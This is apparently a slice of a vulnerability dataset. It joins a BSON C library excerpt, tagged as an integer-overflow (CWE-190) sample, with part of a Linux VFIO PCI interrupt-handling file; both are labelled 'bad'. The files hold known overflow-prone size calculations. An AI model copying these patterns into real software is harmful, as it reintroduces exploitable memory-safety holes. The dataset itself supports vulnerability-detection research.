? bson_iterator_value( i ) + 9
: bson_iterator_value( i ) + 5;
}
MONGO_EXPORT const char *bson_iterator_regex( const bson_iterator *i ) {
return bson_iterator_value( i );
}
MONGO_EXPORT const char *bson_iterator_regex_opts( const bson_iterator *i ) {
const char *p = bson_iterator_value( i );
return p + strlen( p ) + 1;
}
MONGO_EXPORT void bson_iterator_subobject( const bson_iterator *i, bson *sub ) {
bson_init_data( sub, ( char * )bson_iterator_value( i ) );
_bson_reset( sub );
sub->finished = 1;
}
MONGO_EXPORT void bson_iterator_subiterator( const bson_iterator *i, bson_iterator *sub ) {
bson_iterator_from_buffer( sub, bson_iterator_value( i ) );
}
/* ----------------------------
BUILDING
------------------------------ */
static void _bson_init_size( bson *b, int size ) {
if( size == 0 )
b->data = NULL;
else
b->data = ( char * )bson_malloc( size );
b->dataSize = size;
b->cur = b->data + 4;
_bson_reset( b );
}
MONGO_EXPORT void bson_init( bson *b ) {
_bson_init_size( b, initialBufferSize );
}
void bson_init_size( bson *b, int size ) {
_bson_init_size( b, size );
}
static void bson_append_byte( bson *b, char c ) {
b->cur[0] = c;
b->cur++;
}
static void bson_append( bson *b, const void *data, int len ) {
memcpy( b->cur , data , len );
b->cur += len;
}
static void bson_append32( bson *b, const void *data ) {
bson_little_endian32( b->cur, data );
b->cur += 4;
}
static void bson_append64( bson *b, const void *data ) {
bson_little_endian64( b->cur, data );
b->cur += 8;
}
int bson_ensure_space( bson *b, const int bytesNeeded ) {
int pos = b->cur - b->data;
char *orig = b->data;
int new_size;
if ( pos + bytesNeeded <= b->dataSize )
return BSON_OK;
new_size = 1.5 * ( b->dataSize + bytesNeeded );
if( new_size < b->dataSize ) {
if( ( b->dataSize + bytesNeeded ) < INT_MAX )
new_size = INT_MAX;
else {
b->err = BSON_SIZE_OVERFLOW;
return BSON_ERROR;
}
}
b->data = bson_realloc( b->data, new_size );
if ( !b->data )
bson_fatal_msg( !!b->data, "realloc() failed" );
b->dataSize = new_size;
b->cur += b->data - orig;
return BSON_OK;
}
MONGO_EXPORT int bson_finish( bson *b ) {
int i;
if( b->err & BSON_NOT_UTF8 )
return BSON_ERROR;
if ( ! b->finished ) {
if ( bson_ensure_space( b, 1 ) == BSON_ERROR ) return BSON_ERROR;
bson_append_byte( b, 0 );
i = b->cur - b->data;
bson_little_endian32( b->data, &i );
b->finished = 1;
}
return BSON_OK;
}
MONGO_EXPORT void bson_destroy( bson *b ) {
if (b) {
bson_free( b->data );
b->err = 0;
b->data = 0;
b->cur = 0;
b->finished = 1;
}
}
static int bson_append_estart( bson *b, int type, const char *name, const int dataSize ) {
const int len = strlen( name ) + 1;
if ( b->finished ) {
b->err |= BSON_ALREADY_FINISHED;
return BSON_ERROR;
}
if ( bson_ensure_space( b, 1 + len + dataSize ) == BSON_ERROR ) {
return BSON_ERROR;
}
if( bson_check_field_name( b, ( const char * )name, len - 1 ) == BSON_ERROR ) {
bson_builder_error( b );
return BSON_ERROR;
}
bson_append_byte( b, ( char )type );
bson_append( b, name, len );
return BSON_OK;
}
/* ----------------------------
BUILDING TYPES
------------------------------ */
MONGO_EXPORT int bson_append_int( bson *b, const char *name, const int i ) {
if ( bson_append_estart( b, BSON_INT, name, 4 ) == BSON_ERROR )
return BSON_ERROR;
bson_append32( b , &i );
return BSON_OK;
}
MONGO_EXPORT int bson_append_long( bson *b, const char *name, const int64_t i ) {
if ( bson_append_estart( b , BSON_LONG, name, 8 ) == BSON_ERROR )
return BSON_ERROR;
bson_append64( b , &i );
return BSON_OK;
}
MONGO_EXPORT int bson_append_double( bson *b, const char *name, const double d ) {
if ( bson_append_estart( b, BSON_DOUBLE, name, 8 ) == BSON_ERROR )
return BSON_ERROR;
bson_append64( b , &d );
return BSON_OK;
}
MONGO_EXPORT int bson_append_bool( bson *b, const char *name, const bson_bool_t i ) {
if ( bson_append_estart( b, BSON_BOOL, name, 1 ) == BSON_ERROR )
return BSON_ERROR;
bson_append_byte( b , i != 0 );
return BSON_OK;
}
MONGO_EXPORT int bson_append_null( bson *b, const char *name ) {
if ( bson_append_estart( b , BSON_NULL, name, 0 ) == BSON_ERROR )
return BSON_ERROR;
return BSON_OK;
}
MONGO_EXPORT int bson_append_undefined( bson *b, const char *name ) {
if ( bson_append_estart( b, BSON_UNDEFINED, name, 0 ) == BSON_ERROR )
return BSON_ERROR;
return BSON_OK;
}
static int bson_append_string_base( bson *b, const char *name,
const char *value, int len, bson_type type ) {
int sl = len + 1;
if ( bson_check_string( b, ( const char * )value, sl - 1 ) == BSON_ERROR )
return BSON_ERROR;
if ( bson_append_estart( b, type, name, 4 + sl ) == BSON_ERROR ) {
return BSON_ERROR;
}
bson_append32( b , &sl );
bson_append( b , value , sl - 1 );
bson_append( b , "\0" , 1 );
return BSON_OK;
}
MONGO_EXPORT int bson_append_string( bson *b, const char *name, const char *value ) {
return bson_append_string_base( b, name, value, strlen ( value ), BSON_STRING );
}
MONGO_EXPORT int bson_append_symbol( bson *b, const char *name, const char *value ) {
return bson_append_string_base( b, name, value, strlen ( value ), BSON_SYMBOL );
}
MONGO_EXPORT int bson_append_code( bson *b, const char *name, const char *value ) {
return bson_append_string_base( b, name, value, strlen ( value ), BSON_CODE );
}
MONGO_EXPORT int bson_append_string_n( bson *b, const char *name, const char *value, int len ) {
return bson_append_string_base( b, name, value, len, BSON_STRING );
}
MONGO_EXPORT int bson_append_symbol_n( bson *b, const char *name, const char *value, int len ) {
return bson_append_string_base( b, name, value, len, BSON_SYMBOL );
}
MONGO_EXPORT int bson_append_code_n( bson *b, const char *name, const char *value, int len ) {
return bson_append_string_base( b, name, value, len, BSON_CODE );
}
MONGO_EXPORT int bson_append_code_w_scope_n( bson *b, const char *name,
const char *code, int len, const bson *scope ) {
int sl, size;
if ( !scope ) return BSON_ERROR;
sl = len + 1;
size = 4 + 4 + sl + bson_size( scope );
if ( bson_append_estart( b, BSON_CODEWSCOPE, name, size ) == BSON_ERROR )
return BSON_ERROR;
bson_append32( b, &size );
bson_append32( b, &sl );
bson_append( b, code, sl );
bson_append( b, scope->data, bson_size( scope ) );
return BSON_OK;
}
MONGO_EXPORT int bson_append_code_w_scope( bson *b, const char *name, const char *code, const bson *scope ) {
return bson_append_code_w_scope_n( b, name, code, strlen ( code ), scope );
}
MONGO_EXPORT int bson_append_binary( bson *b, const char *name, char type, const char *str, int len ) {
if ( type == BSON_BIN_BINARY_OLD ) {
int subtwolen = len + 4;
if ( bson_append_estart( b, BSON_BINDATA, name, 4+1+4+len ) == BSON_ERROR )
return BSON_ERROR;
bson_append32( b, &subtwolen );
bson_append_byte( b, type );
bson_append32( b, &len );
bson_append( b, str, len );
}
else {
if ( bson_append_estart( b, BSON_BINDATA, name, 4+1+len ) == BSON_ERROR )
return BSON_ERROR;
bson_append32( b, &len );
bson_append_byte( b, type );
bson_append( b, str, len );
}
return BSON_OK;
}
MONGO_EXPORT int bson_append_oid( bson *b, const char *name, const bson_oid_t *oid ) {
if ( bson_append_estart( b, BSON_OID, name, 12 ) == BSON_ERROR )
return BSON_ERROR;
bson_append( b , oid , 12 );
return BSON_OK;
}
MONGO_EXPORT int bson_append_new_oid( bson *b, const char *name ) {
bson_oid_t oid;
bson_oid_gen( &oid );
return bson_append_oid( b, name, &oid );
}
MONGO_EXPORT int bson_append_regex( bson *b, const char *name, const char *pattern, const char *opts ) {
const int plen = strlen( pattern )+1;
const int olen = strlen( opts )+1;
if ( bson_append_estart( b, BSON_REGEX, name, plen + olen ) == BSON_ERROR )
return BSON_ERROR;
if ( bson_check_string( b, pattern, plen - 1 ) == BSON_ERROR )
return BSON_ERROR;
bson_append( b , pattern , plen );
bson_append( b , opts , olen );
return BSON_OK;
}
MONGO_EXPORT int bson_append_bson( bson *b, const char *name, const bson *bson ) {
if ( !bson ) return BSON_ERROR;
if ( bson_append_estart( b, BSON_OBJECT, name, bson_size( bson ) ) == BSON_ERROR )
return BSON_ERROR;
bson_append( b , bson->data , bson_size( bson ) );
return BSON_OK;
}
MONGO_EXPORT int bson_append_element( bson *b, const char *name_or_null, const bson_iterator *elem ) {
bson_iterator next = *elem;
int size;
bson_iterator_next( &next );
size = next.cur - elem->cur;
if ( name_or_null == NULL ) {
if( bson_ensure_space( b, size ) == BSON_ERROR )
return BSON_ERROR;
bson_append( b, elem->cur, size );
}
else {
int data_size = size - 2 - strlen( bson_iterator_key( elem ) );
bson_append_estart( b, elem->cur[0], name_or_null, data_size );
bson_append( b, bson_iterator_value( elem ), data_size );
}
return BSON_OK;
}
MONGO_EXPORT int bson_append_timestamp( bson *b, const char *name, bson_timestamp_t *ts ) {
if ( bson_append_estart( b, BSON_TIMESTAMP, name, 8 ) == BSON_ERROR ) return BSON_ERROR;
bson_append32( b , &( ts->i ) );
bson_append32( b , &( ts->t ) );
return BSON_OK;
}
MONGO_EXPORT int bson_append_timestamp2( bson *b, const char *name, int time, int increment ) {
if ( bson_append_estart( b, BSON_TIMESTAMP, name, 8 ) == BSON_ERROR ) return BSON_ERROR;
bson_append32( b , &increment );
bson_append32( b , &time );
return BSON_OK;
}
MONGO_EXPORT int bson_append_date( bson *b, const char *name, bson_date_t millis ) {
if ( bson_append_estart( b, BSON_DATE, name, 8 ) == BSON_ERROR ) return BSON_ERROR;
bson_append64( b , &millis );
return BSON_OK;
}
MONGO_EXPORT int bson_append_time_t( bson *b, const char *name, time_t secs ) {
return bson_append_date( b, name, ( bson_date_t )secs * 1000 );
}
MONGO_EXPORT int bson_append_start_object( bson *b, const char *name ) {
if ( bson_append_estart( b, BSON_OBJECT, name, 5 ) == BSON_ERROR ) return BSON_ERROR;
b->stack[ b->stackPos++ ] = b->cur - b->data;
bson_append32( b , &zero );
return BSON_OK;
}
MONGO_EXPORT int bson_append_start_array( bson *b, const char *name ) {
if ( bson_append_estart( b, BSON_ARRAY, name, 5 ) == BSON_ERROR ) return BSON_ERROR;
b->stack[ b->stackPos++ ] = b->cur - b->data;
bson_append32( b , &zero );
return BSON_OK;
}
MONGO_EXPORT int bson_append_finish_object( bson *b ) {
char *start;
int i;
if ( bson_ensure_space( b, 1 ) == BSON_ERROR ) return BSON_ERROR;
bson_append_byte( b , 0 );
start = b->data + b->stack[ --b->stackPos ];
i = b->cur - start;
bson_little_endian32( start, &i );
return BSON_OK;
}
MONGO_EXPORT double bson_int64_to_double( int64_t i64 ) {
return (double)i64;
}
MONGO_EXPORT int bson_append_finish_array( bson *b ) {
return bson_append_finish_object( b );
}
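/* Illustrative usage sketch (added note, not from the original source):
* building { "name" : "x", "scores" : [ 1, 2 ] } with the append API, using a
* hypothetical local object "b". Array elements use their decimal index as
* the key.
*
* bson b;
* bson_init( &b );
* bson_append_string( &b, "name", "x" );
* bson_append_start_array( &b, "scores" );
* bson_append_int( &b, "0", 1 );
* bson_append_int( &b, "1", 2 );
* bson_append_finish_array( &b );
* bson_finish( &b );
* ... use bson_data( &b ) and bson_size( &b ) ...
* bson_destroy( &b );
*/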
/* Error handling and allocators. */
static bson_err_handler err_handler = NULL;
MONGO_EXPORT bson_err_handler set_bson_err_handler( bson_err_handler func ) {
bson_err_handler old = err_handler;
err_handler = func;
return old;
}
MONGO_EXPORT void bson_free( void *ptr ) {
bson_free_func( ptr );
}
MONGO_EXPORT void *bson_malloc( int size ) {
void *p;
p = bson_malloc_func( size );
bson_fatal_msg( !!p, "malloc() failed" );
return p;
}
void *bson_realloc( void *ptr, int size ) {
void *p;
p = bson_realloc_func( ptr, size );
bson_fatal_msg( !!p, "realloc() failed" );
return p;
}
int _bson_errprintf( const char *format, ... ) {
va_list ap;
int ret = 0;
va_start( ap, format );
#ifndef R_SAFETY_NET
ret = vfprintf( stderr, format, ap );
#endif
va_end( ap );
return ret;
}
/**
* This method is invoked when a non-fatal bson error is encountered.
* Calls the error handler if available.
*
* @param b the bson object on which the error occurred
*/
void bson_builder_error( bson *b ) {
if( err_handler )
err_handler( "BSON error." );
}
void bson_fatal( int ok ) {
bson_fatal_msg( ok, "" );
}
void bson_fatal_msg( int ok , const char *msg ) {
if ( ok )
return;
if ( err_handler ) {
err_handler( msg );
}
#ifndef R_SAFETY_NET
bson_errprintf( "error: %s\n" , msg );
exit( -5 );
#endif
}
/* Efficiently copy an integer to a string. */
extern const char bson_numstrs[1000][4];
void bson_numstr( char *str, int i ) {
if( i < 1000 )
memcpy( str, bson_numstrs[i], 4 );
else
bson_sprintf( str,"%d", i );
}
MONGO_EXPORT void bson_swap_endian64( void *outp, const void *inp ) {
const char *in = ( const char * )inp;
char *out = ( char * )outp;
out[0] = in[7];
out[1] = in[6];
out[2] = in[5];
out[3] = in[4];
out[4] = in[3];
out[5] = in[2];
out[6] = in[1];
out[7] = in[0];
}
MONGO_EXPORT void bson_swap_endian32( void *outp, const void *inp ) {
const char *in = ( const char * )inp;
char *out = ( char * )outp;
out[0] = in[3];
out[1] = in[2];
out[2] = in[1];
out[3] = in[0];
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_3983_1 |
crossvul-cpp_data_bad_5375_1 | /*
* VFIO PCI interrupt handling
*
* Copyright (C) 2012 Red Hat, Inc. All rights reserved.
* Author: Alex Williamson <alex.williamson@redhat.com>
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
* Derived from original vfio:
* Copyright 2010 Cisco Systems, Inc. All rights reserved.
* Author: Tom Lyon, pugs@cisco.com
*/
#include <linux/device.h>
#include <linux/interrupt.h>
#include <linux/eventfd.h>
#include <linux/msi.h>
#include <linux/pci.h>
#include <linux/file.h>
#include <linux/vfio.h>
#include <linux/wait.h>
#include <linux/slab.h>
#include "vfio_pci_private.h"
/*
* INTx
*/
static void vfio_send_intx_eventfd(void *opaque, void *unused)
{
struct vfio_pci_device *vdev = opaque;
if (likely(is_intx(vdev) && !vdev->virq_disabled))
eventfd_signal(vdev->ctx[0].trigger, 1);
}
void vfio_pci_intx_mask(struct vfio_pci_device *vdev)
{
struct pci_dev *pdev = vdev->pdev;
unsigned long flags;
spin_lock_irqsave(&vdev->irqlock, flags);
/*
* Masking can come from interrupt, ioctl, or config space
* via INTx disable. The latter means this can get called
* even when not using intx delivery. In this case, just
* try to have the physical bit follow the virtual bit.
*/
if (unlikely(!is_intx(vdev))) {
if (vdev->pci_2_3)
pci_intx(pdev, 0);
} else if (!vdev->ctx[0].masked) {
/*
* Can't use check_and_mask here because we always want to
* mask, not just when something is pending.
*/
if (vdev->pci_2_3)
pci_intx(pdev, 0);
else
disable_irq_nosync(pdev->irq);
vdev->ctx[0].masked = true;
}
spin_unlock_irqrestore(&vdev->irqlock, flags);
}
/*
* If this is triggered by an eventfd, we can't call eventfd_signal
* or else we'll deadlock on the eventfd wait queue. Return >0 when
* a signal is necessary, which can then be handled via a work queue
* or directly depending on the caller.
*/
static int vfio_pci_intx_unmask_handler(void *opaque, void *unused)
{
struct vfio_pci_device *vdev = opaque;
struct pci_dev *pdev = vdev->pdev;
unsigned long flags;
int ret = 0;
spin_lock_irqsave(&vdev->irqlock, flags);
/*
* Unmasking comes from ioctl or config, so again, have the
* physical bit follow the virtual even when not using INTx.
*/
if (unlikely(!is_intx(vdev))) {
if (vdev->pci_2_3)
pci_intx(pdev, 1);
} else if (vdev->ctx[0].masked && !vdev->virq_disabled) {
/*
* A pending interrupt here would immediately trigger,
* but we can avoid that overhead by just re-sending
* the interrupt to the user.
*/
if (vdev->pci_2_3) {
if (!pci_check_and_unmask_intx(pdev))
ret = 1;
} else
enable_irq(pdev->irq);
vdev->ctx[0].masked = (ret > 0);
}
spin_unlock_irqrestore(&vdev->irqlock, flags);
return ret;
}
void vfio_pci_intx_unmask(struct vfio_pci_device *vdev)
{
if (vfio_pci_intx_unmask_handler(vdev, NULL) > 0)
vfio_send_intx_eventfd(vdev, NULL);
}
static irqreturn_t vfio_intx_handler(int irq, void *dev_id)
{
struct vfio_pci_device *vdev = dev_id;
unsigned long flags;
int ret = IRQ_NONE;
spin_lock_irqsave(&vdev->irqlock, flags);
if (!vdev->pci_2_3) {
disable_irq_nosync(vdev->pdev->irq);
vdev->ctx[0].masked = true;
ret = IRQ_HANDLED;
} else if (!vdev->ctx[0].masked && /* may be shared */
pci_check_and_mask_intx(vdev->pdev)) {
vdev->ctx[0].masked = true;
ret = IRQ_HANDLED;
}
spin_unlock_irqrestore(&vdev->irqlock, flags);
if (ret == IRQ_HANDLED)
vfio_send_intx_eventfd(vdev, NULL);
return ret;
}
static int vfio_intx_enable(struct vfio_pci_device *vdev)
{
if (!is_irq_none(vdev))
return -EINVAL;
if (!vdev->pdev->irq)
return -ENODEV;
vdev->ctx = kzalloc(sizeof(struct vfio_pci_irq_ctx), GFP_KERNEL);
if (!vdev->ctx)
return -ENOMEM;
vdev->num_ctx = 1;
/*
* If the virtual interrupt is masked, restore it. Devices
* supporting DisINTx can be masked at the hardware level
* here, non-PCI-2.3 devices will have to wait until the
* interrupt is enabled.
*/
vdev->ctx[0].masked = vdev->virq_disabled;
if (vdev->pci_2_3)
pci_intx(vdev->pdev, !vdev->ctx[0].masked);
vdev->irq_type = VFIO_PCI_INTX_IRQ_INDEX;
return 0;
}
static int vfio_intx_set_signal(struct vfio_pci_device *vdev, int fd)
{
struct pci_dev *pdev = vdev->pdev;
unsigned long irqflags = IRQF_SHARED;
struct eventfd_ctx *trigger;
unsigned long flags;
int ret;
if (vdev->ctx[0].trigger) {
free_irq(pdev->irq, vdev);
kfree(vdev->ctx[0].name);
eventfd_ctx_put(vdev->ctx[0].trigger);
vdev->ctx[0].trigger = NULL;
}
if (fd < 0) /* Disable only */
return 0;
vdev->ctx[0].name = kasprintf(GFP_KERNEL, "vfio-intx(%s)",
pci_name(pdev));
if (!vdev->ctx[0].name)
return -ENOMEM;
trigger = eventfd_ctx_fdget(fd);
if (IS_ERR(trigger)) {
kfree(vdev->ctx[0].name);
return PTR_ERR(trigger);
}
vdev->ctx[0].trigger = trigger;
if (!vdev->pci_2_3)
irqflags = 0;
ret = request_irq(pdev->irq, vfio_intx_handler,
irqflags, vdev->ctx[0].name, vdev);
if (ret) {
vdev->ctx[0].trigger = NULL;
kfree(vdev->ctx[0].name);
eventfd_ctx_put(trigger);
return ret;
}
/*
* INTx disable will stick across the new irq setup,
* disable_irq won't.
*/
spin_lock_irqsave(&vdev->irqlock, flags);
if (!vdev->pci_2_3 && vdev->ctx[0].masked)
disable_irq_nosync(pdev->irq);
spin_unlock_irqrestore(&vdev->irqlock, flags);
return 0;
}
static void vfio_intx_disable(struct vfio_pci_device *vdev)
{
vfio_virqfd_disable(&vdev->ctx[0].unmask);
vfio_virqfd_disable(&vdev->ctx[0].mask);
vfio_intx_set_signal(vdev, -1);
vdev->irq_type = VFIO_PCI_NUM_IRQS;
vdev->num_ctx = 0;
kfree(vdev->ctx);
}
/*
* MSI/MSI-X
*/
static irqreturn_t vfio_msihandler(int irq, void *arg)
{
struct eventfd_ctx *trigger = arg;
eventfd_signal(trigger, 1);
return IRQ_HANDLED;
}
static int vfio_msi_enable(struct vfio_pci_device *vdev, int nvec, bool msix)
{
struct pci_dev *pdev = vdev->pdev;
unsigned int flag = msix ? PCI_IRQ_MSIX : PCI_IRQ_MSI;
int ret;
if (!is_irq_none(vdev))
return -EINVAL;
vdev->ctx = kzalloc(nvec * sizeof(struct vfio_pci_irq_ctx), GFP_KERNEL);
if (!vdev->ctx)
return -ENOMEM;
/* return the number of supported vectors if we can't get all: */
ret = pci_alloc_irq_vectors(pdev, 1, nvec, flag);
if (ret < nvec) {
if (ret > 0)
pci_free_irq_vectors(pdev);
kfree(vdev->ctx);
return ret;
}
vdev->num_ctx = nvec;
vdev->irq_type = msix ? VFIO_PCI_MSIX_IRQ_INDEX :
VFIO_PCI_MSI_IRQ_INDEX;
if (!msix) {
/*
* Compute the virtual hardware field for max msi vectors -
* it is the log base 2 of the number of vectors.
*/
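/*
* Illustrative worked example (added note, not from the original
* source): for nvec == 3 this evaluates to fls(5) - 1 == 2, i.e. a
* reported maximum of 2^2 == 4 vectors, the smallest power of two
* that is >= nvec.
*/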
vdev->msi_qmax = fls(nvec * 2 - 1) - 1;
}
return 0;
}
static int vfio_msi_set_vector_signal(struct vfio_pci_device *vdev,
int vector, int fd, bool msix)
{
struct pci_dev *pdev = vdev->pdev;
struct eventfd_ctx *trigger;
int irq, ret;
if (vector < 0 || vector >= vdev->num_ctx)
return -EINVAL;
irq = pci_irq_vector(pdev, vector);
if (vdev->ctx[vector].trigger) {
free_irq(irq, vdev->ctx[vector].trigger);
irq_bypass_unregister_producer(&vdev->ctx[vector].producer);
kfree(vdev->ctx[vector].name);
eventfd_ctx_put(vdev->ctx[vector].trigger);
vdev->ctx[vector].trigger = NULL;
}
if (fd < 0)
return 0;
vdev->ctx[vector].name = kasprintf(GFP_KERNEL, "vfio-msi%s[%d](%s)",
msix ? "x" : "", vector,
pci_name(pdev));
if (!vdev->ctx[vector].name)
return -ENOMEM;
trigger = eventfd_ctx_fdget(fd);
if (IS_ERR(trigger)) {
kfree(vdev->ctx[vector].name);
return PTR_ERR(trigger);
}
/*
* The MSIx vector table resides in device memory which may be cleared
* via backdoor resets. We don't allow direct access to the vector
* table so even if a userspace driver attempts to save/restore around
* such a reset it would be unsuccessful. To avoid this, restore the
* cached value of the message prior to enabling.
*/
if (msix) {
struct msi_msg msg;
get_cached_msi_msg(irq, &msg);
pci_write_msi_msg(irq, &msg);
}
ret = request_irq(irq, vfio_msihandler, 0,
vdev->ctx[vector].name, trigger);
if (ret) {
kfree(vdev->ctx[vector].name);
eventfd_ctx_put(trigger);
return ret;
}
vdev->ctx[vector].producer.token = trigger;
vdev->ctx[vector].producer.irq = irq;
ret = irq_bypass_register_producer(&vdev->ctx[vector].producer);
if (unlikely(ret))
dev_info(&pdev->dev,
"irq bypass producer (token %p) registration fails: %d\n",
vdev->ctx[vector].producer.token, ret);
vdev->ctx[vector].trigger = trigger;
return 0;
}
static int vfio_msi_set_block(struct vfio_pci_device *vdev, unsigned start,
unsigned count, int32_t *fds, bool msix)
{
int i, j, ret = 0;
if (start >= vdev->num_ctx || start + count > vdev->num_ctx)
return -EINVAL;
for (i = 0, j = start; i < count && !ret; i++, j++) {
int fd = fds ? fds[i] : -1;
ret = vfio_msi_set_vector_signal(vdev, j, fd, msix);
}
if (ret) {
for (--j; j >= (int)start; j--)
vfio_msi_set_vector_signal(vdev, j, -1, msix);
}
return ret;
}
static void vfio_msi_disable(struct vfio_pci_device *vdev, bool msix)
{
struct pci_dev *pdev = vdev->pdev;
int i;
for (i = 0; i < vdev->num_ctx; i++) {
vfio_virqfd_disable(&vdev->ctx[i].unmask);
vfio_virqfd_disable(&vdev->ctx[i].mask);
}
vfio_msi_set_block(vdev, 0, vdev->num_ctx, NULL, msix);
pci_free_irq_vectors(pdev);
/*
* Both disable paths above use pci_intx_for_msi() to clear DisINTx
* via their shutdown paths. Restore for NoINTx devices.
*/
if (vdev->nointx)
pci_intx(pdev, 0);
vdev->irq_type = VFIO_PCI_NUM_IRQS;
vdev->num_ctx = 0;
kfree(vdev->ctx);
}
/*
* IOCTL support
*/
static int vfio_pci_set_intx_unmask(struct vfio_pci_device *vdev,
unsigned index, unsigned start,
unsigned count, uint32_t flags, void *data)
{
if (!is_intx(vdev) || start != 0 || count != 1)
return -EINVAL;
if (flags & VFIO_IRQ_SET_DATA_NONE) {
vfio_pci_intx_unmask(vdev);
} else if (flags & VFIO_IRQ_SET_DATA_BOOL) {
uint8_t unmask = *(uint8_t *)data;
if (unmask)
vfio_pci_intx_unmask(vdev);
} else if (flags & VFIO_IRQ_SET_DATA_EVENTFD) {
int32_t fd = *(int32_t *)data;
if (fd >= 0)
return vfio_virqfd_enable((void *) vdev,
vfio_pci_intx_unmask_handler,
vfio_send_intx_eventfd, NULL,
&vdev->ctx[0].unmask, fd);
vfio_virqfd_disable(&vdev->ctx[0].unmask);
}
return 0;
}
static int vfio_pci_set_intx_mask(struct vfio_pci_device *vdev,
unsigned index, unsigned start,
unsigned count, uint32_t flags, void *data)
{
if (!is_intx(vdev) || start != 0 || count != 1)
return -EINVAL;
if (flags & VFIO_IRQ_SET_DATA_NONE) {
vfio_pci_intx_mask(vdev);
} else if (flags & VFIO_IRQ_SET_DATA_BOOL) {
uint8_t mask = *(uint8_t *)data;
if (mask)
vfio_pci_intx_mask(vdev);
} else if (flags & VFIO_IRQ_SET_DATA_EVENTFD) {
return -ENOTTY; /* XXX implement me */
}
return 0;
}
static int vfio_pci_set_intx_trigger(struct vfio_pci_device *vdev,
unsigned index, unsigned start,
unsigned count, uint32_t flags, void *data)
{
if (is_intx(vdev) && !count && (flags & VFIO_IRQ_SET_DATA_NONE)) {
vfio_intx_disable(vdev);
return 0;
}
if (!(is_intx(vdev) || is_irq_none(vdev)) || start != 0 || count != 1)
return -EINVAL;
if (flags & VFIO_IRQ_SET_DATA_EVENTFD) {
int32_t fd = *(int32_t *)data;
int ret;
if (is_intx(vdev))
return vfio_intx_set_signal(vdev, fd);
ret = vfio_intx_enable(vdev);
if (ret)
return ret;
ret = vfio_intx_set_signal(vdev, fd);
if (ret)
vfio_intx_disable(vdev);
return ret;
}
if (!is_intx(vdev))
return -EINVAL;
if (flags & VFIO_IRQ_SET_DATA_NONE) {
vfio_send_intx_eventfd(vdev, NULL);
} else if (flags & VFIO_IRQ_SET_DATA_BOOL) {
uint8_t trigger = *(uint8_t *)data;
if (trigger)
vfio_send_intx_eventfd(vdev, NULL);
}
return 0;
}
static int vfio_pci_set_msi_trigger(struct vfio_pci_device *vdev,
unsigned index, unsigned start,
unsigned count, uint32_t flags, void *data)
{
int i;
bool msix = (index == VFIO_PCI_MSIX_IRQ_INDEX) ? true : false;
if (irq_is(vdev, index) && !count && (flags & VFIO_IRQ_SET_DATA_NONE)) {
vfio_msi_disable(vdev, msix);
return 0;
}
if (!(irq_is(vdev, index) || is_irq_none(vdev)))
return -EINVAL;
if (flags & VFIO_IRQ_SET_DATA_EVENTFD) {
int32_t *fds = data;
int ret;
if (vdev->irq_type == index)
return vfio_msi_set_block(vdev, start, count,
fds, msix);
ret = vfio_msi_enable(vdev, start + count, msix);
if (ret)
return ret;
ret = vfio_msi_set_block(vdev, start, count, fds, msix);
if (ret)
vfio_msi_disable(vdev, msix);
return ret;
}
if (!irq_is(vdev, index) || start + count > vdev->num_ctx)
return -EINVAL;
for (i = start; i < start + count; i++) {
if (!vdev->ctx[i].trigger)
continue;
if (flags & VFIO_IRQ_SET_DATA_NONE) {
eventfd_signal(vdev->ctx[i].trigger, 1);
} else if (flags & VFIO_IRQ_SET_DATA_BOOL) {
uint8_t *bools = data;
if (bools[i - start])
eventfd_signal(vdev->ctx[i].trigger, 1);
}
}
return 0;
}
static int vfio_pci_set_ctx_trigger_single(struct eventfd_ctx **ctx,
unsigned int count, uint32_t flags,
void *data)
{
/* DATA_NONE/DATA_BOOL enables loopback testing */
if (flags & VFIO_IRQ_SET_DATA_NONE) {
if (*ctx) {
if (count) {
eventfd_signal(*ctx, 1);
} else {
eventfd_ctx_put(*ctx);
*ctx = NULL;
}
return 0;
}
} else if (flags & VFIO_IRQ_SET_DATA_BOOL) {
uint8_t trigger;
if (!count)
return -EINVAL;
trigger = *(uint8_t *)data;
if (trigger && *ctx)
eventfd_signal(*ctx, 1);
return 0;
} else if (flags & VFIO_IRQ_SET_DATA_EVENTFD) {
int32_t fd;
if (!count)
return -EINVAL;
fd = *(int32_t *)data;
if (fd == -1) {
if (*ctx)
eventfd_ctx_put(*ctx);
*ctx = NULL;
} else if (fd >= 0) {
struct eventfd_ctx *efdctx;
efdctx = eventfd_ctx_fdget(fd);
if (IS_ERR(efdctx))
return PTR_ERR(efdctx);
if (*ctx)
eventfd_ctx_put(*ctx);
*ctx = efdctx;
}
return 0;
}
return -EINVAL;
}
static int vfio_pci_set_err_trigger(struct vfio_pci_device *vdev,
unsigned index, unsigned start,
unsigned count, uint32_t flags, void *data)
{
if (index != VFIO_PCI_ERR_IRQ_INDEX || start != 0 || count > 1)
return -EINVAL;
return vfio_pci_set_ctx_trigger_single(&vdev->err_trigger,
count, flags, data);
}
static int vfio_pci_set_req_trigger(struct vfio_pci_device *vdev,
unsigned index, unsigned start,
unsigned count, uint32_t flags, void *data)
{
if (index != VFIO_PCI_REQ_IRQ_INDEX || start != 0 || count > 1)
return -EINVAL;
return vfio_pci_set_ctx_trigger_single(&vdev->req_trigger,
count, flags, data);
}
int vfio_pci_set_irqs_ioctl(struct vfio_pci_device *vdev, uint32_t flags,
unsigned index, unsigned start, unsigned count,
void *data)
{
int (*func)(struct vfio_pci_device *vdev, unsigned index,
unsigned start, unsigned count, uint32_t flags,
void *data) = NULL;
switch (index) {
case VFIO_PCI_INTX_IRQ_INDEX:
switch (flags & VFIO_IRQ_SET_ACTION_TYPE_MASK) {
case VFIO_IRQ_SET_ACTION_MASK:
func = vfio_pci_set_intx_mask;
break;
case VFIO_IRQ_SET_ACTION_UNMASK:
func = vfio_pci_set_intx_unmask;
break;
case VFIO_IRQ_SET_ACTION_TRIGGER:
func = vfio_pci_set_intx_trigger;
break;
}
break;
case VFIO_PCI_MSI_IRQ_INDEX:
case VFIO_PCI_MSIX_IRQ_INDEX:
switch (flags & VFIO_IRQ_SET_ACTION_TYPE_MASK) {
case VFIO_IRQ_SET_ACTION_MASK:
case VFIO_IRQ_SET_ACTION_UNMASK:
/* XXX Need masking support exported */
break;
case VFIO_IRQ_SET_ACTION_TRIGGER:
func = vfio_pci_set_msi_trigger;
break;
}
break;
case VFIO_PCI_ERR_IRQ_INDEX:
switch (flags & VFIO_IRQ_SET_ACTION_TYPE_MASK) {
case VFIO_IRQ_SET_ACTION_TRIGGER:
if (pci_is_pcie(vdev->pdev))
func = vfio_pci_set_err_trigger;
break;
